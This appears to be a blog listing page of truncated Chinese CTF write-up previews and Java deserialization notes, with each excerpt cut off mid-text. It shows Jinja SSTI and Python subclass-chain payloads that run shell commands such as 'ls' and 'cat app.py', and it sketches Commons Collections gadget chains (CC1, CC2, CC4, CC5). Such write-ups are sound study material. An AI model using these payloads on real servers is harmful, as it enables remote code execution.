brother打开题目是?name=hello，还回显了hello，看一下后台语言和框架 一眼ssti模版注入， 1?name={{g.pop.__globals__.__builtins__.__import__('os').popen('ls').read()}} 看一下当前目录的东西： 1api.p

扫扫看不用扫，猜测是flag.php flag{094c9cc14068a7d18ccd0dd3606e532f} debudaoflag在cookie里： flag{72077a55w312584wb1aaa88888cd41af} 审计1234567891011121314151617181920212223<?phperror_reporting(0);include(&q

机器人打开页面： 一眼robots.txt 123User-agent: *Disallow: /27f5e15b6af3223f1176293cd015771dFlag: flag{4749ea1ea481a5d 只有一半，还有一半呢？给了一个路由，我们尝试扫扫这个路由： 进入/27f5e15b6af3223f1176293cd015771d/flag.php

ezPHPparse_str()可以进行变量覆盖。 全部流量包： 菜狗工具#1python继承链攻击。 1print(().__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat app.py').read()) 爆率真的高事前准备禁用了ctrl+U、F1

依赖jdk：jdk8u65 CB：commons-beanutils 1.8.3 在pom.xml里添加 12345678910<dependency> <groupId>commons-beanutils</groupId> <artifactId>commons-beanutils</artifactId>

cool_indexserver.js: 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394

跟CC5一样，也是利用CC1的LazyMap.get及之后的部分，也是只改了开头。 这次是利用Hashtable.readObject方法，这个类是可以序列化的。 寻找在AbstractMap类里的equals方法调用了get方法： 12345678public boolean equals(Object o) { ………… if (value == null

CC5也是在CC1的路线上改了改入口类。 从AnnotationInvocationHandler.readObject改成了BadAttributeValueExpException.readObject 沿用CC1从LazyMap.get之后的部分。 寻找在TiedMapEntry类的getValue方法也调用了get方法： 123public Object getValue() {

之前的CC1链是利用TransformedMap的checkSetValue方法来调用ChainedTransformer.transform 而另一种写法是利用LazyMap.get方法走动态代理来调用ChainedTransformer.transform 寻找我们看一下LazyMap类里的get方法 12345678public Object get(Object key) {

详细请看CC4链。CC2链跟CC4链几乎一样，就是在CC4利用InstantiateTransformer类的基础上改成了直接使用InvokerTransformer，其他没变。 123456CC4：Transformer[] transformers = new Transformer[]{ new ConstantTransformer(TrAXFilter.class